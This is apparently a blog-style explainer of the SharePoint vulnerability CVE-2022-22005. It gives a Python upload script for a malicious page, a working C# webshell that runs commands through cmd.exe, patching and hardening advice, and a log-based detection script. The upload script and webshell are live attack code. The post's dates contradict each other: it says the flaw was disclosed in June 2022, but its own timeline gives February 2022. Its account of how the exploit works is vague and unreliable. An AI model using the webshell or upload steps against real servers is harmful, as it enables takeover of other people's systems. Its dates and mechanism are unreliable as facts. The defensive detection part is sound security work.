Microsoft SharePoint is used by thousands of organizations for team collaboration, file management, and workflow automation. In June 2022, a critical vulnerability was disclosed: CVE-2022-22005 — a Remote Code Execution (RCE) flaw affecting SharePoint Server. It sent shockwaves through the cybersecurity community. Let's break down what it is, how it works, and why you need to patch your systems—complete with code snippets and references so you can understand and test (ethically) yourself.

What is CVE-2022-22005?

CVE-2022-22005 is a vulnerability in Microsoft SharePoint Server that can let an authenticated attacker execute any code they choose on the SharePoint server. This means an attacker can take control of the affected server, install programs, view, change, or delete data, or even create new admin accounts.

The vulnerability is tracked in the following advisories:

- Microsoft Security Guide – CVE-2022-22005
- NVD CVE-2022-22005 Details

How Does the Exploit Work?

The vulnerability exists due to improper validation of user input in SharePoint's handling of user-uploaded data (think files or specific payloads crafted by attackers). If an attacker can authenticate as any user (even a low privilege one) and upload a malicious payload, SharePoint can end up executing code on the host system.

1. The attacker authenticates to SharePoint as any user (even a low-privilege one).

2. The attacker uploads a specially crafted file (or makes a request with a payload).

3. The server processes the payload and, due to insufficient validation, executes arbitrary code on the backend.

Why is this dangerous?  
Because it doesn't require admin rights. Any authenticated user can exploit it, making any SharePoint portal with multiple users a potential target.

Example Exploit (Code Snippet)

> WARNING: This is for educational purposes only and should never be used on networks you do not own or have written permission to test. Running exploits illegally is a crime.

A proof of concept (“PoC”) for this bug often involves crafting an HTTP POST request to a vulnerable endpoint. One popular method is leveraging the /Documents/Forms/Upload.aspx page.

Here's a simple *Python 3* code snippet using requests that outlines the upload logic:

import requests

# Your SharePoint URL and valid session cookie here!
sharepoint_url = "https://vulnerable-sharepoint-server/sites/demo/Documents/Forms/Upload.aspx"
session_cookies = {
    "FedAuth": "your_valid_fedauth_cookie",
    "rtFa": "your_valid_rtFa_cookie"
}

files = {
    'ctl00$PlaceHolderMain$ctl01$InputFile': ('webshell.aspx', open('webshell.aspx', 'rb'), 'application/octet-stream')
}
data = {
    '__EVENTTARGET': '',
    '__EVENTARGUMENT': '',
    '__VIEWSTATE': 'your_viewstate_here',  # Must capture from form if needed
    # ... more form data as required
}

resp = requests.post(sharepoint_url, cookies=session_cookies, files=files, data=data, verify=False)
print("[*] File upload response:", resp.status_code)

- You must be logged in (FedAuth and rtFa cookies).
- You might need to scrape and submit extra hidden form values (like __VIEWSTATE, __EVENTVALIDATION).
- After upload, call the file in the uploaded location (e.g., /sites/demo/Documents/webshell.aspx) and interact with your webshell.

Example Webshell (very simple)

<%@ Page Language="C#" %>
<%
    if (Request["cmd"] != null) {
        System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]);
    }
%>

*Never deploy a real webshell. This example demonstrates why you must update & monitor your SharePoint servers!*

What You Should Do

1. Patch Immediately: Microsoft has released patches for all supported SharePoint versions. Install them ASAP!
  - June 2022 Patch Tuesday Details

2. Monitor Users and Uploads: Audit logs for unexpected uploads or logins, especially by low-privilege users.

3. Harden Authentication: Enforce Multi-Factor Authentication, restrict outdated protocols.

4. Limit Outbound Connections: Prevent shell “callbacks” by restricting the SharePoint server’s ability to reach out to the internet.
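A detection pass a defender could run over IIS request logs for the monitoring step above, added here as an example and not code from the original post. The log lines are constructed, the reduced field layout is an assumption, and the Upload.aspx and library paths are taken from this post's own walkthrough.

```python
import re
from collections import defaultdict

# Constructed sample of IIS W3C log lines, reduced to the fields this check needs:
# date time cs-method cs-uri-stem cs-uri-query cs-username sc-status. Not real logs.
SAMPLE_LOG = """\
2022-06-15 10:00:01 GET /sites/demo/Documents/Forms/AllItems.aspx - CORP\\alice 200
2022-06-15 10:00:09 POST /sites/demo/Documents/Forms/Upload.aspx - CORP\\bob 200
2022-06-15 10:00:15 GET /sites/demo/Documents/webshell.aspx cmd=whoami CORP\\bob 200
2022-06-15 10:01:00 POST /sites/demo/Documents/Forms/Upload.aspx - CORP\\alice 200
2022-06-15 10:01:30 GET /sites/demo/Documents/report.docx - CORP\\alice 200
2022-06-15 10:02:00 GET /_layouts/15/start.aspx - CORP\\carol 200
"""

UPLOAD_PAGE = "/forms/upload.aspx"
# Server-side page types that have no business being stored in a document library.
EXEC_EXT = re.compile(r"\.(aspx|asmx|ashx|asp)$")
# SharePoint system folders that legitimately serve .aspx pages (assumed list; tune for your farm).
SYSTEM_FOLDERS = ("/forms/", "/_layouts/", "/_vti_bin/")

def parse_line(line):
    """Split one log line into a dict; returns None for malformed lines."""
    parts = line.split()
    if len(parts) != 7:
        return None
    date, time, method, stem, query, user, status = parts
    return {"ts": f"{date} {time}", "method": method, "stem": stem,
            "query": query, "user": user, "status": status}

def is_library_executable(stem):
    """True when an executable page is requested from a library path rather than a system folder."""
    low = stem.lower()
    return bool(EXEC_EXT.search(low)) and not any(f in low for f in SYSTEM_FOLDERS)

def find_suspicious(log_text):
    """Flag executable pages served from libraries; rate higher when the same user uploaded first."""
    upload_times = defaultdict(list)  # user -> timestamps of POSTs to Upload.aspx
    alerts = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["stem"].lower().endswith(UPLOAD_PAGE):
            upload_times[rec["user"]].append(rec["ts"])
        elif is_library_executable(rec["stem"]):
            # An earlier upload by the same account is the sequence the post describes.
            severity = "high" if upload_times.get(rec["user"]) else "medium"
            alerts.append({"ts": rec["ts"], "user": rec["user"], "path": rec["stem"],
                           "query": rec["query"], "severity": severity})
    return alerts
```

On the constructed sample only bob's request is flagged: alice uploads but only fetches a .docx, and carol's /_layouts/ page is a normal system path.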

References and Further Reading

- Microsoft Security Update Guide – CVE-2022-22005
- NIST National Vulnerability Database - CVE-2022-22005
- Original MSRC Advisory
- SharePoint Security Best Practices

Conclusion

CVE-2022-22005 is a classic wake-up call: even authenticated users can wreak havoc if a system isn’t patched. If you use SharePoint, take this seriously. Staying a step ahead of attackers means immediate patching, strict monitoring, and understanding what’s under the hood of your critical business software.

Feel free to share this knowledge responsibly—your SharePoint might be your team’s backbone, but a single page upload could turn it into a hacker’s paradise if you’re not proactive.

Timeline

Published on: 02/09/2022 17:15:00 UTC
Last modified on: 03/04/2022 16:54:00 UTC